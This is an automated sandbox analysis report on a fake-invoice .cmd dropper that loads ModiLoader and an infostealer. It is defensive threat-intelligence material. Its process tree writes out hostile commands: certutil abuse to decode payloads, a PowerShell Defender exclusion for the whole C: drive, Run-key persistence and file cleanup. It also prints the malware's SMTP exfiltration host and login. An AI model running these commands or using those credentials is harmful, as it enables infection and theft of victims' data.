Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
21-06-2024 01:18
Static task
static1
Behavioral task
behavioral1
Sample
invoice_2024-05-6577588494.cmd
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
invoice_2024-05-6577588494.cmd
Resource
win10v2004-20240611-en
General
-
Target
invoice_2024-05-6577588494.cmd
-
Size
3.5MB
-
MD5
ba2debbaec427ab4f654bccbe788d836
-
SHA1
2d0543aebec81e87cfbf8862060d73c4c7dac196
-
SHA256
94513f7783348cf8d403be267ab537ba7f4e02a215f28b90675b853d93b79948
-
SHA512
d4a0c89b0d749a1deb3b2cf47b235854fe6811c5c3e9826cc1ddf057b8ff19845a8f279cedc47b70f575e616114b4cf850cda359cd18e71efbb07dcc4a808d50
-
SSDEEP
49152:GA6PFw42qcCUt5GKGhqK6GgCYUMCJwUzun28HMA:r
Malware Config
Extracted
Protocol: smtp- Host:
mail.suryaberkatindonesia.com - Port:
587 - Username:
[email protected] - Password:
suryaber123
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 32 IoCs
Processes:
resource yara_rule behavioral2/memory/4748-61-0x000000003DDD0000-0x000000003DE2C000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-63-0x0000000040A10000-0x0000000040A6A000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-69-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-91-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-121-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-119-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-117-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-115-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-111-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-109-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-107-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-105-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-103-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-101-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-97-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-96-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-93-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-89-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-87-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-85-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-84-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-81-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-79-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-78-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-75-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-73-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-71-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-67-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-113-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-99-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-65-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/4748-64-0x0000000040A10000-0x0000000040A64000-memory.dmp INDICATOR_EXE_Packed_GEN01 -
ModiLoader Second Stage 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4748-56-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/4748-59-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Executes dropped EXE 10 IoCs
Processes:
alpha.exealpha.exekn.exealpha.exekn.exeAudio.pifalpha.exealpha.execmd.pifrzjnrxpH.pifpid process 856 alpha.exe 1376 alpha.exe 3148 kn.exe 3736 alpha.exe 868 kn.exe 1608 Audio.pif 1524 alpha.exe 3796 alpha.exe 4564 cmd.pif 4748 rzjnrxpH.pif -
Loads dropped DLL 1 IoCs
Processes:
cmd.pifpid process 4564 cmd.pif -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Audio.pifrzjnrxpH.pifdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hpxrnjzr = "C:\\Users\\Public\\Hpxrnjzr.url" Audio.pif Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows = "C:\\Users\\Admin\\AppData\\Roaming\\windows\\windows.exe" rzjnrxpH.pif -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 32 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Audio.pifdescription pid process target process PID 1608 set thread context of 4748 1608 Audio.pif rzjnrxpH.pif -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exerzjnrxpH.pifpid process 3828 powershell.exe 3828 powershell.exe 4748 rzjnrxpH.pif 4748 rzjnrxpH.pif -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exerzjnrxpH.pifdescription pid process Token: SeDebugPrivilege 3828 powershell.exe Token: SeDebugPrivilege 4748 rzjnrxpH.pif -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exeAudio.pifcmd.execmd.pifdescription pid process target process PID 2688 wrote to memory of 2580 2688 cmd.exe extrac32.exe PID 2688 wrote to memory of 2580 2688 cmd.exe extrac32.exe PID 2688 wrote to memory of 856 2688 cmd.exe alpha.exe PID 2688 wrote to memory of 856 2688 cmd.exe alpha.exe PID 856 wrote to memory of 3436 856 alpha.exe extrac32.exe PID 856 wrote to memory of 3436 856 alpha.exe extrac32.exe PID 2688 wrote to memory of 1376 2688 cmd.exe alpha.exe PID 2688 wrote to memory of 1376 2688 cmd.exe alpha.exe PID 1376 wrote to memory of 3148 1376 alpha.exe kn.exe PID 1376 wrote to memory of 3148 1376 alpha.exe kn.exe PID 2688 wrote to memory of 3736 2688 cmd.exe alpha.exe PID 2688 wrote to memory of 3736 2688 cmd.exe alpha.exe PID 3736 wrote to memory of 868 3736 alpha.exe kn.exe PID 3736 wrote to memory of 868 3736 alpha.exe kn.exe PID 2688 wrote to memory of 1608 2688 cmd.exe Audio.pif PID 2688 wrote to memory of 1608 2688 cmd.exe Audio.pif PID 2688 wrote to memory of 1608 2688 cmd.exe Audio.pif PID 2688 wrote to memory of 1524 2688 cmd.exe alpha.exe PID 2688 wrote to memory of 1524 2688 cmd.exe alpha.exe PID 2688 wrote to memory of 3796 2688 cmd.exe alpha.exe PID 2688 wrote to memory of 3796 2688 cmd.exe alpha.exe PID 1608 wrote to memory of 4592 1608 Audio.pif cmd.exe PID 1608 wrote to memory of 4592 1608 Audio.pif cmd.exe PID 1608 wrote to memory of 4592 1608 Audio.pif cmd.exe PID 1608 wrote to memory of 1604 1608 Audio.pif cmd.exe PID 1608 wrote to memory of 1604 1608 Audio.pif cmd.exe PID 1608 wrote to memory of 1604 1608 Audio.pif cmd.exe PID 1608 wrote to memory of 4568 1608 Audio.pif cmd.exe PID 1608 wrote to memory of 4568 1608 Audio.pif cmd.exe PID 1608 wrote to memory of 4568 1608 Audio.pif cmd.exe PID 4568 wrote to memory of 4564 4568 cmd.exe cmd.pif PID 4568 wrote to memory of 4564 4568 cmd.exe cmd.pif PID 4564 wrote to memory of 3828 4564 cmd.pif powershell.exe PID 4564 wrote to memory of 3828 4564 cmd.pif powershell.exe PID 1608 wrote to memory of 1852 1608 Audio.pif extrac32.exe PID 1608 wrote to memory of 1852 1608 Audio.pif extrac32.exe PID 1608 wrote to memory of 1852 1608 Audio.pif extrac32.exe PID 1608 wrote to memory of 4748 1608 Audio.pif rzjnrxpH.pif PID 1608 wrote to memory of 4748 1608 Audio.pif rzjnrxpH.pif PID 1608 wrote to memory of 4748 1608 Audio.pif rzjnrxpH.pif PID 1608 wrote to memory of 4748 1608 Audio.pif rzjnrxpH.pif PID 1608 wrote to memory of 4748 1608 Audio.pif rzjnrxpH.pif
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\invoice_2024-05-6577588494.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:2580
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:3436
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\invoice_2024-05-6577588494.cmd" "C:\\Users\\Public\\Audio.mp4" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\invoice_2024-05-6577588494.cmd" "C:\\Users\\Public\\Audio.mp4" 93⤵
- Executes dropped EXE
PID:3148 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 123⤵
- Executes dropped EXE
PID:868 -
C:\Users\Public\Libraries\Audio.pifC:\Users\Public\Libraries\Audio.pif2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows "3⤵PID:4592
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows \System32"3⤵PID:1604
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\\Windows \\System32\\cmd.pif"3⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows \System32\cmd.pif"C:\\Windows \\System32\\cmd.pif"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3828 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Hpxrnjzr.PIF3⤵PID:1852
-
C:\Users\Public\Libraries\rzjnrxpH.pifC:\Users\Public\Libraries\rzjnrxpH.pif3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4748 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1524 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
PID:3796
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.6MB
MD52f6760ed95e0a93dba8419dc5eabccbf
SHA1139239677e8a572c8caef3ce393737557756a172
SHA2566f322e181418d95f5a9fc12f9adbc5728b6173ac7b19b7bf8e346bfcce57c8bc
SHA5125ad72622de9d5b829a9c974a0b4f9b630ada38bce5d87b2e231f447b544f9da081be28073f844d595e9611d24824e772ff1dc602ec1a576be0105ee406bda81f
-
Filesize
1.3MB
MD5a38702206e839d7a2fed5dbbdf91d689
SHA1fd6477a5f7e81692ec8b8c245f2681ea5e2f24e5
SHA256f73eb6fb2423ef07681da6c0a3033faec6e645f23e561d7ede802a7c2c07ea0c
SHA512c285a1c70f08fe3205855513ef620888d2789f7f59837705948ace71338813db5b122533f7a613dc445319551f464e3937ef4f9408a79e6a88874d88e7b6e2e1
-
Filesize
182KB
MD53776012e2ef5a5cae6935853e6ca79b2
SHA14fc81df94baaaa550473ac9d20763cfb786577ff
SHA2568e104cc58e62de0eab837ac09b01d30e85f79045cc1803fa2ef4eafbdbd41e8d
SHA51238811cb1431e8b7b07113ae54f1531f8992bd0e572d9daa1029cf8692396427285a4c089ffd56422ca0c6b393e9fca0856a5a5cd77062e7e71bf0a670843cfb8
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
Filesize
94KB
MD5869640d0a3f838694ab4dfea9e2f544d
SHA1bdc42b280446ba53624ff23f314aadb861566832
SHA2560db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA5126e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7
-
Filesize
110KB
MD5a50a86252349e4536e72653145bb938f
SHA1c7602b39d739852321b1b35b9d784fdb005d1689
SHA2566c62b515d798303eae096883f66afc0150dcf2f970b4ebfe8465c990294c97ae
SHA5123c4f6025588425871466f1267dd6ba1db0e9d5e78bca1ac0375c56b8f39023cc8e41f43efbd8e30a75afc921d176bf8c4d66ae8fe28e4e8081049bac48b9433d